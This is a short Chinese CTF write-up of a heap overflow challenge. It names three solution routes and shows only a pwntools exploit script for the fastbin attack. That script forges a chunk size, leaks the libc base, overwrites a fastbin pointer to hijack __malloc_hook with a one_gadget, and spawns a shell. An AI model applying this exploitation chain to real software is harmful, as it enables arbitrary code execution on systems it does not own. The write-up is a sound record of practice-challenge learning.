本来想学习house of force,结果没用就直接做出来了。。。我用了三种方法来做这道题。
1.fastbins attack
2.unlink
3.house of force
可以改写got表,程序在edit的时候可以进行溢出。
fasbins attack
通过溢出改写size字段,构造堆块重叠,泄露libc,改写fd指针,通过realloc调整栈帧,打__malloc_hook拿shell。常规操作,直接贴exp了
1 from pwn import * 2 3 p = process('./pwn') 4 libc = ELF('./libc.so.6') 5 context.log_level = 'debug' 6 7 def duan(): 8 gdb.attach(p) 9 pause() 10 def add(size,content): 11 p.sendlineafter('choice:','2') 12 p.sendlineafter('name:',str(size)) 13 p.sendafter('item:',content) 14 def show(): 15 p.sendlineafter('choice:','1') 16 def edit(index,size,content): 17 p.sendlineafter('choice:','3') 18 p.sendlineafter('item:',str(index)) 19 p.sendlineafter('name:',str(size)) 20 p.sendafter('item:',content) 21 def delete(index): 22 p.sendlineafter('choice:','4') 23 p.sendlineafter('item:',str(index)) 24 25 og = [0x45226,0x4527a,0xf0364,0xf1207] 26 27 add(0x20,'aaaaaaaa') 28 add(0x20,'bbbbbbbb') 29 add(0x60,'cccccccc') 30 add(0x10,'cccccccc') 31 32 edit(0,0x30,'a'*0x20+p64(0)+p64(0xa1)) 33 delete(1) 34 add(0x20,'aaaaaaaa') 35 show() 36 libc_base = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00'))-88-0x10-libc.symbols['__malloc_hook'] 37 malloc_hook = libc_base+libc.symbols['__malloc_hook'] 38 realloc = libc_base+libc.symbols['realloc'] 39 print 'libc_base-->'+hex(libc_base) 40 print 'malloc_hook-->'+hex(malloc_hook) 41 shell = libc_base+og[3] 42 43 add(0x60,'bbbbbbbb') 44 delete(4) 45 edit(2,0x10,p64(malloc_hook-0x23)) 46 add(0x60,'aaaaaaaa') 47 add(0x60,'a'*(0x13-0x8)+p64(shell)+p64(realloc+20)) 48 p.sendlineafter('choice:','2') 49 p.sendlineafter('name:',str(0x10)) 50 p.interactive()